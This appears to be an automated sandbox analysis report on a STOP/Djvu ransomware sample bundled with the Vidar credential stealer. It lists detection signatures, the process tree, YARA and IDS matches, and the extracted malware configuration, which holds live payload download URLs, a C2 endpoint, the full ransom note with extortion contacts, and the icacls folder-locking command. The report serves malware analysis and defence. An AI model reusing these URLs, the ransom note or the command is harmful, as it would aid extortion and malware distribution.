Windows Analysis Report
9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe

Overview

General Information

Sample name:9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
Analysis ID:1373508
MD5:3eeb7b2030517f91fdf0f4c5278d8e76
SHA1:c4c3a4650d278f2f8b9bf871c2ae91508ffae165
SHA256:4ad7b8d228fe32d82b0373ce886f224f47c2e06a59d394c634160c70083b5f32
Tags:exe
Infos:

Detection

Babuk, Djvu, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found stalling execution ending in API Sleep call
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign process
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapter information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe (PID: 7496 cmdline: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe MD5: 3EEB7B2030517F91FDF0F4C5278D8E76)
    • icacls.exe (PID: 7576 cmdline: icacls "C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
    • 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe (PID: 7608 cmdline: "C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe" --Admin IsNotAutoStart IsNotTask MD5: 3EEB7B2030517F91FDF0F4C5278D8E76)
      • build2.exe (PID: 7756 cmdline: "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe" MD5: C4070DA9F9B0581171AF16E681CCDFF8)
        • build2.exe (PID: 7772 cmdline: "C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exe" MD5: C4070DA9F9B0581171AF16E681CCDFF8)
  • cleanup
Name:Babuk
Description:Babuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and an old 32-bit PE executable were observed over time as well. It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.
Attribution:No Attribution
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk

Name:STOP, Djvu
Description:STOP Djvu is a ransomware that encrypts user data with AES-256 and adds one of the dozen available extensions as a marker to the encrypted file's name. It does not encrypt the entire file, only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.
Attribution:No Attribution
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

Name:Vidar
Description:Vidar is a forked malware based on Arkei. It seems this stealer is one of the first to grab information on 2FA software and Tor Browser.
Attribution:No Attribution
Link:https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"Download URLs": ["http://brusuax.com/dl/build2.exe", "http://zexeq.com/files/1/build3.exe"], "C2 url": "http://zexeq.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-99MNqXMrdS\r\nPrice of private key and decrypt software is $1999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $999.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0840ASdw", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", 
"C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\\/sWjMd\\\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7vAvQJa0bzVOF1YKNM9ycEaFo3i1IYPt\\\\nxz\\/jq68R20b+hkZtNTv54hcU7\\/Ez+0pdyzteV5Zhg7wXU130hV2tpLc73CPJWPbH\\\\n1Cb\\/TPj2BV1MyBjdQNygBMKZXr5AiecEZscmy3tPXp6G+PWkUj06eqE1m7OGGguB\\\\n99Z7DX1\\/1zY5jmMj5lpDmJWwWf7WaMni1yYPeNWGd67CNvvOmb+YjuTg4HXMAgQ2\\\\nWnCip4mCf70IqmZ2U\\/J0OUQFuCkNaQb0Q0aLFcT4bMDszWR\\/xOhuh2YWJQ0LO+gm\\\\nJQIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeMALWARE_Win_STOPDetects STOP ransomwareditekSHen
    • 0xfe888:$x1: C:\SystemID\PersonalID.txt
    • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
    • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
    • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
    • 0xfecec:$s1: " --AutoStart
    • 0xfed00:$s1: " --AutoStart
    • 0x102948:$s2: --ForNetRes
    • 0x102910:$s3: --Admin
    • 0x102d90:$s4: %username%
    • 0x102eb4:$s5: ?pid=
    • 0x102ec0:$s6: &first=true
    • 0x102ed8:$s6: &first=false
    • 0xfedf4:$s7: delself.bat
    • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
    • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
    • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
      • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
      C:\Users\user\AppData\Local\Temp\tmp3BC7.tmpMALWARE_Win_STOPDetects STOP ransomwareditekSHen
      • 0xfe888:$x1: C:\SystemID\PersonalID.txt
      • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
      • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
      • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
      • 0xfecec:$s1: " --AutoStart
      • 0xfed00:$s1: " --AutoStart
      • 0x102948:$s2: --ForNetRes
      • 0x102910:$s3: --Admin
      • 0x102d90:$s4: %username%
      • 0x102eb4:$s5: ?pid=
      • 0x102ec0:$s6: &first=true
      • 0x102ed8:$s6: &first=false
      • 0xfedf4:$s7: delself.bat
      • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
      • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
      • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
      C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        SourceRuleDescriptionAuthorStrings
        00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          00000000.00000003.1662696538.0000000003391000.00000004.00000020.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x3570:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          00000000.00000002.1668028279.0000000000B91000.00000020.00000001.01000000.00000003.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          00000002.00000000.1666073748.00000000002E1000.00000020.00000001.01000000.00000007.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0xc9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          00000003.00000000.1667079139.0000000000C5C000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
            SourceRuleDescriptionAuthorStrings
            10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
              10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
              • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
              • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
              10.0.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
              • 0xfe888:$x1: C:\SystemID\PersonalID.txt
              • 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
              • 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\
              • 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\
              • 0xfecec:$s1: " --AutoStart
              • 0xfed00:$s1: " --AutoStart
              • 0x102948:$s2: --ForNetRes
              • 0x102910:$s3: --Admin
              • 0x102d90:$s4: %username%
              • 0x102eb4:$s5: ?pid=
              • 0x102ec0:$s6: &first=true
              • 0x102ed8:$s6: &first=false
              • 0xfedf4:$s7: delself.bat
              • 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
              • 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
              • 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
                2.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
                • 0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
                • 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
                No Sigma rule has matched
                Timestamp:01/12/24-06:48:00.971760
                Source IP:192.168.2.4
                Destination IP:175.120.254.9
                SID:2833438
                Source Port:49732
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Timestamp:01/12/24-06:48:06.593430
                Source IP:192.168.2.4
                Destination IP:175.120.254.9
                SID:2833438
                Source Port:49740
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Timestamp:01/12/24-06:48:12.962877
                Source IP:192.168.2.4
                Destination IP:175.120.254.9
                SID:2833438
                Source Port:49746
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Timestamp:01/12/24-06:48:01.179520
                Source IP:192.168.2.4
                Destination IP:186.147.159.149
                SID:2020826
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Timestamp:01/12/24-06:48:01.179520
                Source IP:192.168.2.4
                Destination IP:186.147.159.149
                SID:2036333
                Source Port:49734
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Timestamp:01/12/24-06:48:04.269814
                Source IP:192.168.2.4
                Destination IP:175.120.254.9
                SID:2020826
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                Timestamp:01/12/24-06:48:04.269814
                Source IP:192.168.2.4
                Destination IP:175.120.254.9
                SID:2036333
                Source Port:49735
                Destination Port:80
                Protocol:TCP
                Classtype:A Network Trojan was detected

                AV Detection

                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeAvira: detected
                Source: http://zexeq.com/files/1/build3.exe$runURL Reputation: Label: malware
                Source: http://zexeq.com/files/1/build3.exedAvira URL Cloud: Label: malware
                Source: http://zexeq.com/test1/get.phpAvira URL Cloud: Label: malware
                Source: http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637;9Avira URL Cloud: Label: malware
                Source: http://brusuax.com/dl/build2.exeAvira URL Cloud: Label: malware
                Source: http://zexeq.com/files/1/build3.exe$runeAvira URL Cloud: Label: malware
                Source: http://zexeq.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=trueAvira URL Cloud: Label: malware
                Source: http://brusuax.com/dl/build2.exe$runAvira URL Cloud: Label: malware
                Source: 10.2.9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe.2e0000.0.unpackMalware Configuration Extractor: Djvu
                Source: zexeq.comVirustotal: Detection: 20%Perma Link
                Source: brusuax.comVirustotal: Detection: 18%Perma Link
                Source: http://zexeq.com/test1/get.phpVirustotal: Detection: 19%Perma Link
                Source: http://zexeq.com/files/1/build3.exedVirustotal: Detection: 16%Perma Link
                Source: http://brusuax.com/dl/build2.exeVirustotal: Detection: 25%Perma Link
                Source: http://zexeq.com/files/1/build3.exe$runeVirustotal: Detection: 16%Perma Link
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeReversingLabs: Detection: 79%
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeReversingLabs: Detection: 79%
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeReversingLabs: Detection: 86%
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeReversingLabs: Detection: 86%
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeVirustotal: Detection: 78%Perma Link
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeJoe Sandbox ML: detected
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA1178 CryptDestroyHash,CryptReleaseContext,0_2_00BA1178
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00B9E870
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,0_2_00B9EAA0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9EA51 CryptDestroyHash,CryptReleaseContext,0_2_00B9EA51
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00B9EC68 CryptDestroyHash,CryptReleaseContext,0_2_00B9EC68
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 0_2_00BA0FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,0_2_00BA0FC0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EE870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_002EE870
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EEAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_002EEAA0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F0FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_002F0FC0
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002F1178 CryptDestroyHash,CryptReleaseContext,2_2_002F1178
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EEA51 CryptDestroyHash,CryptReleaseContext,2_2_002EEA51
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 2_2_002EEC68 CryptDestroyHash,CryptReleaseContext,2_2_002EEC68
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00B9E870
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,3_2_00B9EAA0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA0FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,3_2_00BA0FC0
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00BA1178 CryptDestroyHash,CryptReleaseContext,3_2_00BA1178
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9EA51 CryptDestroyHash,CryptReleaseContext,3_2_00B9EA51
                Source: C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: 3_2_00B9EC68 CryptDestroyHash,CryptReleaseContext,3_2_00B9EC68
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040B920 CryptUnprotectData,LocalAlloc,LocalFree,5_2_0040B920
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_00417660 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,5_2_00417660
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040B8A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,5_2_0040B8A0
                Source: C:\Users\user\AppData\Local\2043c9f1-9422-4e25-987e-e8805acfbfc0\build2.exeCode function: 5_2_0040DB40 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,5_2_0040DB40
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeCode function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9F90
                Source: C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Code function: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ72_2_002F9E70
                Source: 9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe Binary or memory string: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAnyUOiB2xE7x0hu\/sWjMd\\nsFuLWuCJ5W6ojiVZfPkO3WsiKQE44ncZ7

                Compliance

